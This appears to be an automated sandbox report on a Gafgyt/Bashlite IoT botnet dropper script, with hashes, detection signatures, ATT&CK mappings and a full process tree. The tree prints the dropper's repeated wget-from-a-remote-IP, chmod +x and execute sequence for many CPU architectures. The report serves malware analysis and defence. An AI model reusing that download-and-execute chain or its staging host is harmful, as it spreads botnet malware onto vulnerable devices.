gafgyt | d1f89f4c630323b37a6f669903f2e617a0616052c4b900e33d0b9eb41084514f

Analysis

max time kernel
21s
max time network
25s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
03-01-2025 07:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

shell.sh
Size

327B
MD5

be3860edd084c6394d9894627d926283
SHA1

0084acbf7a34fece5ee66fd63b64234d5d2238d8
SHA256

d1f89f4c630323b37a6f669903f2e617a0616052c4b900e33d0b9eb41084514f
SHA512

06440f218923e2062a940299d2386762eb228d87a5407430191733865e122a0cb4a5c076b07ff9b5547933b80653555cbfcfc4b7d31eedcc6f132372d6be105a

Score

10^/10

gafgyt botnet defense_evasion discovery upx

Malware Config

Extracted

Family

gafgyt

127.0.0.1:80

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral2/files/fstream-6.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
705	chmod
713	chmod
719	chmod
725	chmod
747	chmod
759	chmod
770	chmod
694	chmod
797	chmod
811	chmod
782	chmod
736	chmod
672	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/.z	689	.z
/tmp/.z	702	.z
/tmp/.z	710	.z
/tmp/.z	716	.z
/tmp/.z	722	.z
/tmp/.z	732	.z
/tmp/.z	744	.z
/tmp/.z	755	.z
/tmp/.z	766	.z
/tmp/.z	778	.z
/tmp/.z	792	.z
/tmp/.z	806	.z
/tmp/.z	817	.z

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-2.dat	upx
behavioral2/files/fstream-3.dat	upx
behavioral2/files/fstream-4.dat	upx
behavioral2/files/fstream-5.dat	upx

Reads runtime system information 13 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
715	wget
716	.z
707	rm
708	wget
710	.z
714	rm

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.z	shell.sh

/tmp/shell.sh
/tmp/shell.sh
1⤵
- Writes file to tmp directory
PID:663
- /bin/rm
  rm -rf .z
  2⤵
  PID:664
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:666
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:672
- /bin/rm
  rm -rf x86_64
  2⤵
  PID:675
- /usr/bin/wget
  wget http://212.64.199.97/Simps/x86_64 -O -
  2⤵
  PID:678
- /tmp/.z
  ./.z x86_64
  2⤵
  - Executes dropped EXE
  PID:689
- /bin/rm
  rm -rf .z
  2⤵
  PID:691
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:692
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /bin/rm
  rm -rf i586
  2⤵
  PID:695
- /usr/bin/wget
  wget http://212.64.199.97/Simps/i586 -O -
  2⤵
  PID:697
- /tmp/.z
  ./.z i586
  2⤵
  - Executes dropped EXE
  PID:702
- /bin/rm
  rm -rf .z
  2⤵
  PID:703
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:704
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:705
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:707
- /usr/bin/wget
  wget http://212.64.199.97/Simps/mips -O -
  2⤵
  - System Network Configuration Discovery
  PID:708
- /tmp/.z
  ./.z mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:710
- /bin/rm
  rm -rf .z
  2⤵
  PID:711
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:712
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:713
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:714
- /usr/bin/wget
  wget http://212.64.199.97/Simps/mipsel -O -
  2⤵
  - System Network Configuration Discovery
  PID:715
- /tmp/.z
  ./.z mipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:716
- /bin/rm
  rm -rf .z
  2⤵
  PID:717
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:718
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:719
- /bin/rm
  rm -rf armv4l
  2⤵
  PID:720
- /usr/bin/wget
  wget http://212.64.199.97/Simps/armv4l -O -
  2⤵
  PID:721
- /tmp/.z
  ./.z armv4l
  2⤵
  - Executes dropped EXE
  PID:722
- /bin/rm
  rm -rf .z
  2⤵
  PID:723
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:724
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:725
- /bin/rm
  rm -rf armv5l
  2⤵
  PID:726
- /usr/bin/wget
  wget http://212.64.199.97/Simps/armv5l -O -
  2⤵
  PID:727
- /tmp/.z
  ./.z armv5l
  2⤵
  - Executes dropped EXE
  PID:732
- /bin/rm
  rm -rf .z
  2⤵
  PID:733
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:734
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /bin/rm
  rm -rf armv6l
  2⤵
  PID:738
- /usr/bin/wget
  wget http://212.64.199.97/Simps/armv6l -O -
  2⤵
  PID:739
- /tmp/.z
  ./.z armv6l
  2⤵
  - Executes dropped EXE
  PID:744
- /bin/rm
  rm -rf .z
  2⤵
  PID:745
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:746
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /bin/rm
  rm -rf armv7l
  2⤵
  PID:749
- /usr/bin/wget
  wget http://212.64.199.97/Simps/armv7l -O -
  2⤵
  PID:751
- /tmp/.z
  ./.z armv7l
  2⤵
  - Executes dropped EXE
  PID:755
- /bin/rm
  rm -rf .z
  2⤵
  PID:757
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:758
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /bin/rm
  rm -rf powerpc
  2⤵
  PID:761
- /usr/bin/wget
  wget http://212.64.199.97/Simps/powerpc -O -
  2⤵
  PID:762
- /tmp/.z
  ./.z powerpc
  2⤵
  - Executes dropped EXE
  PID:766
- /bin/rm
  rm -rf .z
  2⤵
  PID:767
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:768
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /bin/rm
  rm -rf sparc
  2⤵
  PID:771
- /usr/bin/wget
  wget http://212.64.199.97/Simps/sparc -O -
  2⤵
  PID:773
- /tmp/.z
  ./.z sparc
  2⤵
  - Executes dropped EXE
  PID:778
- /bin/rm
  rm -rf .z
  2⤵
  PID:779
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:781
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /bin/rm
  rm -rf m68k
  2⤵
  PID:784
- /usr/bin/wget
  wget http://212.64.199.97/Simps/m68k -O -
  2⤵
  PID:785
- /tmp/.z
  ./.z m68k
  2⤵
  - Executes dropped EXE
  PID:792
- /bin/rm
  rm -rf .z
  2⤵
  PID:793
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:795
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /bin/rm
  rm -rf i686
  2⤵
  PID:799
- /usr/bin/wget
  wget http://212.64.199.97/Simps/i686 -O -
  2⤵
  PID:801
- /tmp/.z
  ./.z i686
  2⤵
  - Executes dropped EXE
  PID:806
- /bin/rm
  rm -rf .z
  2⤵
  PID:807
- /bin/cp
  cp .z
  2⤵
  - Reads runtime system information
  PID:809
- /bin/chmod
  chmod +x .z
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /bin/rm
  rm -rf sh4
  2⤵
  PID:813
- /usr/bin/wget
  wget http://212.64.199.97/Simps/sh4 -O -
  2⤵
  PID:814
- /tmp/.z
  ./.z sh4
  2⤵
  - Executes dropped EXE
  PID:817

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.z

Filesize
66KB

MD5
33127be57dc9ff0d1ef1f51e613c5517

SHA1
4fde704f7e241a2d760bad03f3e2fa7b3267f70d

SHA256
b9cc82bf75b97d7d94783ac1b33da7e842180af893d930812b79c186956707f5

SHA512
0f864972b44b689bfe4a4da70b5e94ea281f2acd43b26227bf68b13c4075422092454ebb4254fd66d3650362aad978ec271187c6cffeb74ff94a3e5ef091c348

Download Submit
/tmp/.z

Filesize
62KB

MD5
5c086f6372f862e1b7a7f8b9fb9fa431

SHA1
d09655cca5a41dfdbdafa1245411445efbb72449

SHA256
71a55da4de94d324669f43a83e14a5b20154fefdf03b1051bad2ae181f314676

SHA512
3c3f06257e1638e3fa6ff33ba107c5a49cba56429e0e0ec5c551864044c003263557102f7f9d7b1151c8d24099d4f28124672e0510ebb5629f3e71434dc26e30

Download Submit
/tmp/.z

Filesize
66KB

MD5
82999462377666d1c50486d94b4160ad

SHA1
58c62d44ff09fa07fe3d214e27b96e504eb62728

SHA256
0df50e6986da2c391072e5e135f807b263b98f7303796278e4d60fa39a161cfd

SHA512
cecabe8ad74d0c57f546c86b01d26dadf0cc8b436a8a2b6fece78bd158156f2e1c5b2270ea8c44e7e6a2eca0e690b119abd05f33f099301782a5356c86602fe6

Download Submit
/tmp/.z

Filesize
67KB

MD5
82a0a8e54c823931b1d3c9f043a760c0

SHA1
e67075c0cdc2451355c425502660e35b3f97d827

SHA256
2b2d11f90643979799af9d1e234d21234f75beb37fec69cd09418e3600c15c44

SHA512
3781540bc763ffbfd8e6065ac6fd057eeb18b77873e3cb80f310ea34acf7443c4c335d366e392c862ffdb5a07552232b208075035a42dd14f395772d00d65b78

Download Submit
/tmp/.z

Filesize
221KB

MD5
ba3641a22b6c6002cf3c94474a74ecee

SHA1
781190657e1a92bc448912a5ca394180434fa8f9

SHA256
5e9fdee0284c4b67992c106331a58cb6759187466b72bacdfb0659bd4db6f294

SHA512
93b3cb8b5b39f59cf303a07fabfd01361ef2724a28496290074f18ed9abbeadd817fcbc70438fdd68f34f3c3ead518a32a4a2ce3914b68952bcd9a32fd6770ad

Download Submit